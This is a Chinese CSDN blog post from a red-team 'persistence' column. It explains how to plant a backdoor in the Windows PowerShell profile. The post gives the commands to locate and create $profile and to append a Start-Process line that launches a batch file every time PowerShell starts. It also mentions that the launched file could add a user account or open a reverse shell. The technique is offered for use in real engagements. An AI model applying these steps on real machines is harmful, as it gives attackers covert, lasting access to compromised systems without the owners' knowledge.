权限维持——powershell配置文件后门

明月清风~~

已于 2022-02-19 22:09:49 修改

阅读量763

点赞数

分类专栏： # 权限维持 # 红队技巧文章标签： java 开发语言后端

于 2022-02-18 18:31:57 首次发布

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/qq_50854790/article/details/123009230

版权

红队技巧同时被 2 个专栏收录

25 篇文章 2 订阅

订阅专栏

15 篇文章 1 订阅

订阅专栏

参考：https://zhuanlan.zhihu.com/p/401733128
0x05 powershell配置文件后门

Powershell配置文件其实就是一个powershell脚本，他可以在每次运行powershell的时候自动运行，所以可以通过向该文件写入自定义的语句用来长期维持权限。

依次输入以下命令，查看当前是否存在配置文件。

echo $profile
Test-path $profile

在这里插入图片描述

如果返回false则需要创建一个

New-Item -Path $profile -Type File –Force

然后写入命令，这里我以创建一个用户为目标，也可以写成反弹shell的，因为之前测试过程中写入过数据，所以这里我是三条内容。

这里的C:\1.bat是我的后门文件位置，实战情况下，各位需要按照实际文件路径来修改
在这里插入图片描述

$string = 'Start-Process "C:\1.bat"'
$string | Out-File -FilePath $profile -Append
more $profile

在这里插入图片描述

然后再次打开powershell便会触发。

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
打赏
0
评论
权限维持——powershell配置文件后门

0x05 powershell配置文件后门Powershell配置文件其实就是一个powershell脚本，他可以在每次运行powershell的时候自动运行，所以可以通过向该文件写入自定义的语句用来长期维持权限。依次输入以下命令，查看当前是否存在配置文件。echo $profileTest-path $profile如果返回false则需要创建一个New-Item -Path $profile -Type File –Force然后写入命令，这里我以创建一个用户为目标，也可以写成反弹s
复制链接

扫一扫

专栏目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

打赏作者

明月清风~~ 你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20

扫码支付：¥1

获取中

扫码支付

您的余额不足，请更换扫码支付或充值

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。